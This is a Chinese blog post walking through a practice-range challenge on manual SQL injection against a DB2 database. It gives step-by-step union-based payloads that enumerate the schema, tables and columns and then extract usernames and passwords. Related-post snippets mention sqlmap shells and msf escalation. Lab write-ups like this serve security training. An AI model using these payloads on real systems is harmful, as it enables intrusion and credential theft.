墨者-SQL手工注入漏洞测试(Db2数据库)

已于 2024-07-22 20:38:35 修改
阅读量87 收藏
点赞数 1
分类专栏: 墨者靶场 文章标签: 数据库 sql
于 2024-07-22 20:11:23 首次发布
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qq_66105152/article/details/140618342
版权

1.判断是否存在注入点
/new_list.php?id=1 and 1=1

/new_list.php?id=1 and 1=2

2.order by判断存在的列数
order by 4

order by 5

3.用union select判断回显位置发现显示不出来,union select 1,2,3,4 from sysibm.systables就可以回显了

SYSIBM.SYSDUMMY1表是一个内存的特殊表(按照Oracle的术语,习惯称之为“伪表”),常用于访问DB2中的寄存器,从而返回特定需要内容。(此外VALUES也可用于访问寄存器)

4.查数据库
new_list.php?id=-1 union select 1,current schema,3,4 from sysibm.systables

5.查表
/new_list.php?id=-1 union%20select 1,2,tabname,4 from%20syscat.tables where tabschema='DB2INST1' limit 0,1

/new_list.php?id=-1 union select 1,2,tabname,4 from%20syscat.tables where tabschema='DB2INST1' limit 1,1

6.查字段
union select 1,2,column_name,4 from sysibm.columns where table_schema=current schema and table_name='GAME_CHARACTER' limit 0,1

union select 1,2,column_name,4 from sysibm.columns where table_schema=current schema and table_name='GAME_CHARACTER' limit 1,1

union select 1,2,column_name,4 from sysibm.columns where table_schema=current schema and table_name='GAME_CHARACTER' limit 2,1


union select 1,name,password,4 from GAME_CHARACTER limit 0,1

╰落叶梧桐细数悲伤゛
关注
  • 1
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
DB2数据库注入
Vi_vids的博客
03-26 1257
db2数据库 这里使用的靶场为墨者学院在线靶场 确定字段数 确定回显位 id=-1 union select 1,2,3,4 from syscat.tables 查看数据库基本信息/爆库 爆表可以使用的表可以是syscat.tables,也可以是syscat.columns、sysibm.sysdummy1 科普时间 sysibm.sysdummy1 表是DB2数据库中的系统表,存放着系统的相关信息 id=-1 union select 1,current schema,current s
墨者 - SQL手工注入漏洞测试(Db2数据库)
吃肉唐僧的博客
07-11 2744
进入环境,用order by测试,发现可以,并测试到字段为4 接下来用union select 1,2,3,4 发现失败 后来上网看了别人的思路是union select 1,2,3,4 from sysibm.systables就可以回显了 应该是不同的数据库语法问题 爆库 id=2 union select 1,2,current schema,4 from sysibm...
DB2数据库SQL注入语句
02-17
可以试试学习一下,不可以滥用, 猜用户表数量: and 0<(SELECT count(NAME) FROM SYSIBM.SYSTABLES where CREATOR=USER)
360众测靶场题库之77-SQL手工注入漏洞测试(Db2数据库)
zjl12344的博客
03-12 388
360众测靶场题库
DB2数据库SQL注入手册1
08-08
DB2数据库SQL注入手册1
墨者靶场 post ,DB2,绕过登录,sql注入四关
最新发布
07-22
通关攻略墨者靶场 post ,DB2,绕过登录,sql注入四关
APP原型实例:墨者科技-旅行小蜜APP2.0.rp
12-17
产品经理
0080 APP原型实例:墨者科技-旅行小蜜APP2.0.rp
01-06
rp原型源文件
墨者学院-HTML前端代码分析(暗链)、HTTP动作练习、IP地址伪造(第2题)
05-29
HTML前端代码分析(暗链)、HTTP动作练习、IP地址伪造(第2题)、phpMyAdmin后台文件包含分析溯源、PHP代码分析溯源(第1题)、PHP代码分析溯源(第2题)、PHP逻辑漏洞利用实战(第1题)、SQL手工注入漏洞测试(Access数据库)
WebShell文件上传漏洞分析溯源
02-22
2. 渗透测试:通过渗透测试来检测Web应用程序是否存在文件上传漏洞。 3. 漏洞扫描:使用漏洞扫描工具来检测Web应用程序是否存在文件上传漏洞。 六、WebShell 文件上传漏洞的实践案例 在这个实践案例中,我们使用...
sql注入工具sqlmap
06-16
sqlmap是一个自动化的sql注入渗透工具,指纹检测、注入方式、注入成功后的取数据等等都是自动化的,甚至还提供了一个字典来将取回来的hash爆破,是ctf sql注入题的必备帮手
sqlinjection in db2数据库
Coisini的博客
05-25 323
使用DB2的人比较少了,今天碰到了一个可供注入DB2网站,想试试身手。不过在网上很难找到相关的资料,只好自己研究了。 参考了IBM DB2的文档,总结了这样几条: 1、select NAME from SYSIBM.SYSTABLES where CREATOR =USER 可以返回系统中所有用户创建的表(table)名 2、select NAME from SYSIBM.SYSCOLUMNS ...
刷题笔记:SQL手工注入漏洞测试(Sql Server数据库
m0_67399862的博客
03-26 914
进入网页后,用and语句来判断是否有注入点,当输入and 1=2时,页面报错,而输入and 1=1时,页面恢复,说明可能存在注入点 用order by 语句来判断字段数,因为order by5时页面报错,而order by4时页面没有报错,则说明该字段数为4 用union select语句,但页面报错,网页不兼容,则上网查了查,需要用union all select 但页面仍然报错,考虑字符串的问题,后面的数字逐个加单引号试,直至页面不报错 然后将2的位置换为d...
db2中count(*) as cnt报错_WEB安全之SQL注入(4)——floor报错
weixin_42497299的博客
12-17 528
大家好,我是阿里斯,一名IT行业小白。今天分享的内容是报错注入,本篇文章会以floor报错为中心进行分析,希望对你有所帮助!报错注入利用情景页面上没有显示位。但是会输出sql语句执行错误的信息floor报错注入常用函数 | 方法rand() 随机数函数floor() 向下取整函数count() 计数函数group by 分组方法floor...
SQL手工注入漏洞测试(Sql Server数据库)
qq_36933272的博客
08-31 390
寻找注入点 and 1=1 ,and 2=1 判断字段 order by N# 虽然3报错,但4有回显。判断是4个字段 查看回显位置id=2 and 2=1 union all select 1,2,‘3’,4# 查询数据库id=2 and 2=1 union all select 1,2,db_name(),4# 查询表 id=2 and 2=1%20 union all select 1,(s...
java db2 sql注入_Hibernate使用中,防止SQL注入的一些措施
weixin_35955473的博客
02-13 283
Hibernate是一个开放源代码的对象关系映射框架,它对JDBC进行了非常轻量级的对象封装,使得Java程序员可以随心所欲的使用对象编程思维来操纵数据库。在获取便利操作的同时,SQL注入问题也值得我们的密切注意,下面就来谈谈几点如何避免SQL注入:1.对参数名称进行绑定:Query query=session.createQuery(hql);query.setString(“name”,na...
小迪安全26WEB 攻防-通用漏洞&SQL 注入 &Sqlmap&Oracle&Mongodb&DB2
weixin_73760178的博客
02-18 1228
通过sqlmap找到管理员账号和密码,从而登入后台,再利用后台进行os-shell的连接实现shell交互,此时通过shell交互便可获取到对方服务器的IP等敏感信息,同时,在自己的服务器中开启监听,利用高级权限读写文件,向对服务器写入payload(.exe)并运行,实现上线服务器,然后在监听过程中开启msf,从而提权。猜回显位:用的是单引号,进行猜测,因为在数据库中加入单引号是一种字符类型的,通过SQL语句,判断之后的数据是否能正常的显示页面,从而进行判断注入点。测回显:/new_list.php?
web渗透--23--SQL注入(下)
武天旭的博客
09-15 1422
6、各数据库注入 注:释义中的'-'代表和上一个一样,因为一个释义可能有几种形式的SQL语句嘛,下同 6.1、DB2数据库 释义 SQL语句 其他 当前数据库 select current server from sysibm.sysdummy1 - 所有数据库 SELECT schemaname FROM syscat.schemata
墨者-sql手工注入漏洞测试
04-29
墨者安全团队是一支专注于网络安全领域的团队,他们致力于网络安全研究和技术推广。其中,手工注入漏洞测试是他们的一项重要工作之一。 在进行手工注入漏洞测试时,墨者安全团队通常会通过一系列的步骤来进行测试。首先,他们会对目标网站进行初步信息收集,包括了解目标网站的架构、数据库类型、应用程序等等。然后,他们会通过手工注入的方式对目标网站进行攻击,以确定是否存在注入漏洞,并尝试获取敏感信息。 在手工注入的过程中,墨者安全团队通常会使用一些工具来辅助测试,例如Burp Suite、SQLMap等。同时,他们也会根据目标网站的具体情况进行一些自定义的测试,以提高测试效果。 总的来说,墨者安全团队的手工注入漏洞测试方法比较系统和全面,可以有效地发现目标网站中存在的注入漏洞,从而帮助企业提高网络安全防护水平。
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值